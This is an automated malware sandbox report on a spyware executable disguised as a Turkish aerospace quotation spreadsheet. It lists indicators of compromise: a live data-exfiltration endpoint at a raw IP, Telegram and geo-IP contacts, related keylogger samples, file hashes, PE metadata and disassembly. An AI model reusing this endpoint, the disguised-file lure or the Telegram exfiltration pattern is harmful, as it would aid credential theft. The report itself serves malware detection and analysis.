https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	RegSvcs.exe, 00000002.00000002.2658183432.00000000029BE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	RegSvcs.exe, 00000002.00000002.2658183432.000000000287B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028C0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	RegSvcs.exe, 00000002.00000002.2658183432.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028C0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576573
Start date and time:	2024-12-17 09:40:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe renamed because original name is a hash value
Original Sample Name:	TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 47 Number of non-executed functions: 292
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:41:26	API Interceptor	2629868x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Order129845.exe	Get hash	malicious	AgentTesla	Browse
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse
104.21.67.152	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
158.101.44.242	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	77541373_BESOZT00_2024_99101234_1_4_1.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
reallyfreegeoip.org	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	188.114.97.3
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
api.telegram.org	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Order129845.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	69633f.msi	Get hash	malicious	Vidar	Browse	149.154.167.99
	Order129845.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://forms.gle/WXkgv9t1iFkxFXZb7	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	RkB7FehGh6.exe	Get hash	malicious	LummaC	Browse	104.21.2.110
	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1	Get hash	malicious	Unknown	Browse	172.67.181.93
	c5bnEkMx.ps1	Get hash	malicious	LummaC	Browse	104.21.64.1
	Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk	Get hash	malicious	Unknown	Browse	104.21.83.229
	sEOELQpFOB.lnk	Get hash	malicious	RedLine	Browse	188.114.97.6
	ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	188.114.97.6
	payload_1.hta	Get hash	malicious	RedLine	Browse	104.21.87.65
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
ORACLE-BMC-31898US	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	ldr.ps1	Get hash	malicious	GO Miner, Xmrig	Browse	147.154.227.160
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	end.exe	Get hash	malicious	Unknown	Browse	130.61.86.87
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	V7giEUv6Ee.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
	BwQ1ZjHbt3.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1	Get hash	malicious	Unknown	Browse	149.154.167.220
	Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220
	sEOELQpFOB.lnk	Get hash	malicious	RedLine	Browse	149.154.167.220
	ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	149.154.167.220
	payload_1.hta	Get hash	malicious	RedLine	Browse	149.154.167.220
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ei0woJS3Dy.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220
	tz1WicW6sG.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
File Type:	data
Category:	dropped
Size (bytes):	274432
Entropy (8bit):	6.786577296720934
Encrypted:	false
SSDEEP:	6144:tjU906zNj9a9fsMOfo/wekpCyyzBBy3USGCvevdVT0ML3u:tjUe6d9a9EMOfo/wekp1gBIgCgVTNLe
MD5:	58AE01D5E5445AA65CA70E6909275FC8
SHA1:	0D5AB748D766BE753424CE503C0573C206EF75DA
SHA-256:	277FDA8BB2B7977A4E2F40BC193CF7C170E593AFD9D782E853BBA5A00FD8A7E1
SHA-512:	144D17E66197B67DB1259C51EA836960CDA0E7D9AF995C7ABFFA5A1CFF023F9CC10CEB8F55EC982F831F2D3B7DBEDBB49AC6C93BE7896CA87CFEDEC7E1EA1504
Malicious:	false
Reputation:	low
Preview:	.m.3H4M4UE94..5Y.2K7H3K4.4QE94QO5YC2K7H3K4M4QE94QO5YC2K7H3K4.4QE7+.A5.J.j.I....\86.D# R+"_kT)]%[9.3 .F$!.0-..x..&[)Q.H4>uO5YC2K7.vK4.5RE..)5YC2K7H3.4O5ZDi4QU1YC&K7H3K4..UE9.QO5.G2K7.3K.M4QG94UO5YC2K7L3K4M4QE9.UO5[C2K7H3I4..QE)4Q_5YC2[7H#K4M4QE)4QO5YC2K7H3C.I4.E94Q.1YT"K7H3K4M4QE94QO5YC2KWL3G4M4QE94QO5YC2K7H3K4M4QE94QO5YC2K7H3K4M4QE94QO5YC2K7H.K4E4QE94QO5YC2C.H3.4M4QE94QO5YmF.O<3K4),UE9.QO5CG2K5H3K4M4QE94QO5Yc2KWfA8F.4QE.$QO5.G2K%H3K(I4QE94QO5YC2K7.3KtcF4)VWQO9YC2KWL3K6M4Qk=4QO5YC2K7H3K4.4Q.94QO5YC2K7H3K4M4.}=4QO5Y.2K7J3N4.SEI.PO6YC2.7H5..O4.E94QO5YC2K7H3K4M4QE94QO5YC2K7H3K4M4QE94QO5Y.O.8..]>..E94QO5XA1O1@;K4M4QE94/O5Y.2K7.3K4z4QE.4QOXYC2o7H354M4/E945O5Y12K7)3K4.4QEV4QO[YC257H3U6e.QE3.wO7qb2K=H..Go4QO.5QO1`2K=.1K4IGuE9>.L5YGAn7H9.0M4U6.4QE.\C2O..3H.[2QE"[hO5SC1."N3K/g.QG..QO?Yi.K4.&M4M/{g96.F5YG..DU3K2ewQE3@XO5[.8K7L.U6epQE3.s1>YC6`7b.58M4Un9.s18YC6`7b-I.@4QA../A5YG.K.jMD4M0zE.S.:YC6a.6#K4I.Qo.J@O5]h2a.6!K4I.Qo.JBO5]h2a.6'K4I.Qo.JDO5]h2a.6%K4I.Qo.JFO5]h2a.6+K4I.Qo'6.W5YG.M.*39.X4!F

C:\Users\user\AppData\Local\Temp\aut2654.tmp

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
File Type:	data
Category:	dropped
Size (bytes):	119396
Entropy (8bit):	7.905156644392857
Encrypted:	false
SSDEEP:	3072:JjXF99pKfpzKRIt5ix0cLBYTq2mGKdADNSAY:Jj1Y14ISxW90yDNvY
MD5:	34EAE0A79DE608976D75789A6A5E08F6
SHA1:	45B465AFFC662771FE25C548E0ADCD9938410866
SHA-256:	25A562DF1FA99D31071705E9B0962407E7CBE7A85067A85521E1541836D4E0D7
SHA-512:	21093BCDB6F9CC07408B7E491F82EBB319B79D366463A359862644EFA38167EA3375ECD808056DB0D9BE2B7CEBD217C7F403BE52D80D54DDF73C121E3A2B9002
Malicious:	false
Reputation:	low
Preview:	EA06..0..[{.:D.4..g3Mv.kY..szD.4..* .EF.5.....M...9..D.W..}.....I.....m..H..)\..k.Jk.Z..)3.Fh.I.Va-.C......)....I...#1...i.......R...\.5.Q-3J.VcY...1...Q.@..3G.$!.:\P.@..f.P....(....+`....!....S4.......#.$....8e&i...a...RD...U.:8....%.D.sJ(..hqzD...I.m.]O.....`..h`....#.?.j.....%.@...@..E$.......:4.SV..i..L......z.E....p.O.#}.$.,.H.L..N...E......!..&..u>i...........g.p..+...>c@...j^.HA@-14......B...[.....!/.$&............B..HV.....!U.Yb..,.=w...6)..{H..h....s5...2.......=.9.ti.Z...n..'<....6..&.Z..eO..t.UneQ..v.\|.C..dT.._g.Th..uF.?..b....MM.Se..<.m..$.....3...p..X.d8s.'b2. \.$...}Y...{.Fk8.l-.."p.%.m'i@.Th18.....Fiq.U6.4../TX...........h...6...O..m. ."B.%.......Z...jJ.%.0...`.X..5p.F...L.8...CF.aj4....@X+T...i{..iT..b.]......i/........5.R&t.5NUQ..o.!..,....:\...Qg3...Y......mN..(...N.H...1.&...."8....A.Rf...z.6...3J.7.L.s.EH...C.U..5..f..T.gK.S.....e..h<.....Z:@.L.Y..&.0..m[......k[.S..zD.....S.L.K...`..d. ..gT....i.Ri.@.".4...syg..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.969158191867485
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
File size:	1'079'296 bytes
MD5:	711d0893a047d1aaabd5cb4c1fd8f4ad
SHA1:	e555d7e2ec5f631e9317b62d004ff4069a4b20e2
SHA256:	8b0966ac0b9d10efd2de59fd1f3949c0c5fd24a293193396022d949cecb8ef7d
SHA512:	32017ddff18679927a74a8697a122ab8388258335c9da4fd02ef5c75deec5587b3c4a07bf8a5a72a6558501f727cf698c9bf296f1d2d1cd5eccfc94a3eaa4c26
SSDEEP:	24576:IqDEvCTbMWu7rQYlBQcBiT6rprG8aUCqgHGLXx:ITvC/MTQYxsWR7aU
TLSH:	5735BF027391D022FFAB95334B9AF7115BBC6A260123E51F13981DB9BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	3570b480858580c5

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67611DD2 [Tue Dec 17 06:44:34 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F5B394AFD53h
jmp 00007F5B394AF65Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F5B394AF83Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F5B394AF80Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F5B394B23FDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F5B394B2448h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F5B394B2431h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x30c80	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x105000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x30c80	0x30e00	dace8ec6a302757a41114114a9153ece	False	0.9581102141943734	data	7.934774571883042	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x105000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd4350	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4478	0x162c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain	0.906800563777308
RT_STRING	0xd5aa4	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xd6038	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xd66c4	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xd6b54	0x5fc	data	English	Great Britain	0.3087467362924282
